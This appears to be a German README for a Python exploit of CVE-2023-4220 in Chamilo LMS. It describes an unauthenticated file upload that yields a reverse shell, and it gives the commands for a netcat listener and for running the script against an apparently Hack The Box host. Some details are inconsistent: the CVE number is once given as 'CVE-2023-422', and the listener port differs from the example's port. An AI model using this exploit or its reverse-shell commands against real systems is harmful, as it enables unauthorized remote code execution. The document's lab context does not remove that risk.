
Python-Exploit für CVE-2023-4220 in Chamilo LMS, der eine Datei hochlädt und eine unauthentifizierte Reverse Shell an einen netcat-Listener liefert.
pip install requests
Das Python-Skript nutzt die Schwachstelle CVE-2023-422, um eine Datei auf den Server hochzuladen, und verwendet diese Datei, um eine Reverse Shell an den netcat-Listener zu senden – und all dies kann ohne Authentifizierung durchgeführt werden. Sie müssen jedoch die folgenden Schritte befolgen, um das Python-Skript erfolgreich zu verwenden.
netcat-Listener starten:
nc -lnvp 4444
Python-Skript ausführen (Beispiel):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Bitte hinterlassen Sie einen Stern, wenn der folgende Exploit nützlich war :)